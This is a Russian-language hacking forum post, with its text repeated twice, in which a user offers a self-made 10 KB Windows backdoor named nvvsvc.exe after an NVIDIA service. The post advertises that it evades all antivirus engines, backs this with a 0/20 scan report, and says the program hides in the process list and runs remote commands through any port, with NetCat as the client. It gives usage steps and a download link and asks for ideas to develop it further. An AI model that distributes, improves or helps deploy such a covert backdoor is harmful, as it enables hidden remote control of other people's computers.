[ac1D]
11.05.2010, 19:19
Недавно написал бекдор для своих целей. Решил поделить, потому что:
[+] - Ничем не палится.
[+] - Весит 10кб.
[+] - Можно открыть любой порт и спрятать(будет только в процессах).
[+] - Главный поток ничем не забит -> не тормозит.
[+] - Можно конектиться к серверу сколько влезет, пока он есть в процессах.
[-] - Не пишется в автозагрузку. Могу сделать, просто с мои личные, эта цель не входила.
http://s003.radikal.ru/i203/1005/1a/905293d596b6.gif
P.S. В качестве клиента советую юзать NetCat, свой клиент написал за 5 мин, так как не хотел изобретать велосипед))
How2:
Открываем nvvsvc.exe вписываем свой порт, жмем Open, затем Hide Me, и сервер остается только в процессах.
Затем в клиенте конектимся , и отсылаем команду) И нам приходит результат ее выполнения.
[ Download this shit (http://slil.ru/29114674) ]
Хотелось бы услышать предложения по развитию этого сервера)
Report date:2010-05-12 19:15:39 (GMT 1) File name:nvvsvc.exe File size:10752 bytes MD5 hash:e662c3ebed0894f2cd018b1e5d179c2e SHA1 hash:8a0a78a31aeb4c067fb44f1288fddb0c45d07511 Detection rate: 0 on 20 (0%) Status:CLEAN AntivirusDatabaseEngineResult a-squared12/05/20105.0.0.7-Avast100331-14.8.1368-AVG271.1.1/28689.0.0.725-Avira AntiVir7.10.7.917.6.0.59-BitDefender12/05/20107.0.0.2555-ClamAV12/05/20100.96.1-Comodo34683.13.579-Dr.Web12/05/20105.0-F-PROT6201005124.5.1.85-G-Data21.1402.0.7309.847-Ikarus T312/05/20101.1.84.0-Kaspersky12/05/20109.0.0.736-McAfee31/03/20105.1.0.0-NOD3251094.0.474-Panda11/05/201010.0.3.0-Solo12/05/20109.0-2010-TrendMicro1619.120-1004-VBA3212/05/20103.12.12.2-VirusBuster
1.5.6-Zoner12/05/20100.2- Extra information File type:Executable File (EXE)Packer:Nothing foundBinder detector:Nothing foundPDF analyzer:Nothing found_http://scanner.novirusthanks.org/analysis/e662c3ebed0894f2cd018b1e5d179c2e/bnZ2c3ZjLmV4ZQ==/
[+] - Ничем не палится.
[+] - Весит 10кб.
[+] - Можно открыть любой порт и спрятать(будет только в процессах).
[+] - Главный поток ничем не забит -> не тормозит.
[+] - Можно конектиться к серверу сколько влезет, пока он есть в процессах.
[-] - Не пишется в автозагрузку. Могу сделать, просто с мои личные, эта цель не входила.
http://s003.radikal.ru/i203/1005/1a/905293d596b6.gif
P.S. В качестве клиента советую юзать NetCat, свой клиент написал за 5 мин, так как не хотел изобретать велосипед))
How2:
Открываем nvvsvc.exe вписываем свой порт, жмем Open, затем Hide Me, и сервер остается только в процессах.
Затем в клиенте конектимся , и отсылаем команду) И нам приходит результат ее выполнения.
[ Download this shit (http://slil.ru/29114674) ]
Хотелось бы услышать предложения по развитию этого сервера)
Report date:2010-05-12 19:15:39 (GMT 1) File name:nvvsvc.exe File size:10752 bytes MD5 hash:e662c3ebed0894f2cd018b1e5d179c2e SHA1 hash:8a0a78a31aeb4c067fb44f1288fddb0c45d07511 Detection rate: 0 on 20 (0%) Status:CLEAN AntivirusDatabaseEngineResult a-squared12/05/20105.0.0.7-Avast100331-14.8.1368-AVG271.1.1/28689.0.0.725-Avira AntiVir7.10.7.917.6.0.59-BitDefender12/05/20107.0.0.2555-ClamAV12/05/20100.96.1-Comodo34683.13.579-Dr.Web12/05/20105.0-F-PROT6201005124.5.1.85-G-Data21.1402.0.7309.847-Ikarus T312/05/20101.1.84.0-Kaspersky12/05/20109.0.0.736-McAfee31/03/20105.1.0.0-NOD3251094.0.474-Panda11/05/201010.0.3.0-Solo12/05/20109.0-2010-TrendMicro1619.120-1004-VBA3212/05/20103.12.12.2-VirusBuster
1.5.6-Zoner12/05/20100.2- Extra information File type:Executable File (EXE)Packer:Nothing foundBinder detector:Nothing foundPDF analyzer:Nothing found_http://scanner.novirusthanks.org/analysis/e662c3ebed0894f2cd018b1e5d179c2e/bnZ2c3ZjLmV4ZQ==/